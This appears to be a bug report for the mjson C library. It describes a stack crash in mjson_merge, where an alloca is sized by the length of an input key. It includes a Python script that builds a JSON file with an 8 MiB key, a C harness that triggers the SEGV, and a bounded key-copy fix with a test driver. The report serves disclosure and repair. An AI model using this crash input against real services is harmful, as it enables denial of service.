Description
When reading in a larger key, it will cause alloca to allocate an incorrect memory address, resulting in a SEGV.
Version
commit 696969cd0d35399cc66075f5ec7a96e23ba4a89b (HEAD -> master, origin/master, origin/HEAD)
Author: novlean <[email protected]>
Date: Wed Mar 5 18:00:56 2025 +0000
Update README.md
added mongoose
Steps to reproduce
$ git clone https://github.com/cesanta/mjson.git
$ cd mjson
$ python3 poc.py
$ clang -g -O0 harness.c ./src/mjson.c
$ ./harness
You can use the following Python script to generate the PoC:
import os

if __name__ == "__main__":
    with open("poc.json", "w") as f:
        f.write("{")
        f.write('"{}":1,'.format("A" * 8388608))
        f.write("}")
The harness is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "src/mjson.h"

static int print_to_buffer(const char *buf, int len, void *userdata) {
    write(1, buf, len);
    return len;
}

int main() {
    char *s = malloc(2147483700);
    FILE *f = fopen("./poc.json", "r");
    if (s == NULL || f == NULL) return 1;
    /* read byte-wise and NUL-terminate after the bytes actually read, so strlen() stays in bounds */
    size_t n = fread(s, 1, 2147483699, f);
    s[n] = '\0';
    const char *s2 = "{\"age\": 31, \"city\": \"New York\"}";
    char buffer[100];
    char *p = buffer;
    int bytes_written = mjson_merge(s, strlen(s), s2, strlen(s2), print_to_buffer, &p);
    (void) bytes_written;
    return 0;
}
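The failure above comes from sizing an alloca by a key length taken from the input. As an added example that is not mjson's own code, the following shows the bounded pattern a fix would use: a fixed-size stack scratch buffer for short keys, the heap for longer ones, and an assumed cap MAX_KEY_LEN above which the key is refused; classify_key_len is a constructed driver that exercises it with the 8 MiB key length from the PoC.

```c
#include <stdlib.h>
#include <string.h>

/* Upper bound on one JSON key: an assumed policy limit, not an mjson setting. */
#define MAX_KEY_LEN ((size_t) 64 * 1024)
/* Fixed-size stack scratch: the frame can no longer grow with input length
 * the way alloca(klen + 1) does. */
#define STACK_SCRATCH 256

enum key_where { KEY_REJECTED = -1, KEY_ON_STACK = 0, KEY_ON_HEAP = 1 };

/* Make a NUL-terminated copy of key[0..klen). Short keys land in the caller's
 * scratch buffer, longer ones on the heap, and anything above MAX_KEY_LEN is
 * refused before any allocation. Release the copy with key_release(). */
static enum key_where key_copy(const char *key, size_t klen,
                               char *scratch, size_t scratch_cap, char **out) {
    char *dst;
    *out = NULL;
    if (klen > MAX_KEY_LEN) return KEY_REJECTED;
    if (klen + 1 <= scratch_cap) {
        dst = scratch;
    } else {
        dst = malloc(klen + 1);
        if (dst == NULL) return KEY_REJECTED;
    }
    memcpy(dst, key, klen);
    dst[klen] = '\0';
    *out = dst;
    return dst == scratch ? KEY_ON_STACK : KEY_ON_HEAP;
}

static void key_release(char *copy, const char *scratch) {
    if (copy != NULL && copy != scratch) free(copy);
}

/* Constructed driver: build a key of klen 'A's (as poc.py does) and report
 * which path key_copy took, verifying the copy is intact on success. */
static int classify_key_len(size_t klen) {
    char scratch[STACK_SCRATCH];
    char *copy = NULL, *key = malloc(klen + 1);
    enum key_where w;
    if (key == NULL) return KEY_REJECTED;
    memset(key, 'A', klen);
    key[klen] = '\0';
    w = key_copy(key, klen, scratch, sizeof scratch, &copy);
    if (w != KEY_REJECTED && strcmp(copy, key) != 0) w = KEY_REJECTED;
    key_release(copy, scratch);
    free(key);
    return w;
}
```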